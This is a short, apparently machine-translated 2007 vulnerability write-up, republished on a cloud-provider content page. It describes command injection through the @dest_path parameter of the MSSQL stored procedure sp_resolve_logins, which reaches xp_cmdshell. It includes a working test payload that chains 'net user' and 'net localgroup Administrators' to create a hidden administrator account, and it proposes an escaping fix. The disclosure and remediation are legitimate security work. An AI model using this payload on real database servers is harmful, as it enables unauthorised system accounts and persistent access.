An injection vulnerability study of MSSQL self-stored procedures

Source: Internet
Author: User
Tags mssql rtrim
Infos:mssql an injection of its own stored procedure
Author: Madman [BCT]
date:10/11/2007

I see the MSSQL stored process, there is a model of the filter in the sample. Then I went to read their stored procedures. I found an injection.
Said the madman.
The vulnerability information is as follows:

Master.. In the sp_resolve_logins stored procedure, the @dest_path parameters are not strictly filtered, which leads to xp_cmdshell injection.

Analysis:
Copy Code code as follows:

SELECT @dest_path = RTRIM (LTRIM (@dest_path))

-If The last char is ' \ ', remove it.
IF substring (@dest_path, Len (@dest_path), 1) = ' \ '
SELECT @dest_path = substring (@dest_path, 1, Len (@dest_path)-1)

--Don ' t do validation if it's a UNC path due to security problem.
--If The server is started as a service using Local System account, we
--don ' t have access to the UNC path.
IF substring (@dest_path, 1,2) <> ' \ '
BEGIN
SELECT @command = ' dir ' + @dest_path + ' '
exec @retcode = master. xp_cmdshell @command, ' no_output '
IF @ @error <> 0
Return (1)
IF @retcode <> 0
BEGIN
RAISERROR (14430, 1, @dest_path)
Return (1)
End
End


Master.. Sp_resolve_logins stored procedures in this section, after a certain degree of judgment, the @dest_path carried out a certain filter.
But no filtering "(double quotes) caused xp_cmdshell to execute arbitrary SQL statements

Test code:
EXEC sp_resolve_logins ' text ', ' e:\asp\ ' &net user Admina admin/add&net localgroup Administrators Admina/add&amp ;d ir "e:\asp ', ' 1.asp '
Execute the above MSSQL statement and successfully add a system account named Admina

However, this stored procedure code is judged and requires the account number of the system Systemadmin permissions.

The madman provides a way to fix it:
Copy Code code as follows:

Using function Fn_escapecmdshellsymbolsremovequotes to filter the @dest_path is OK. Such as:
SELECT @dest_path = RTRIM (Fn_escapecmdshellsymbolsremovequotes (@dest_path)) so that no injection is generated.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.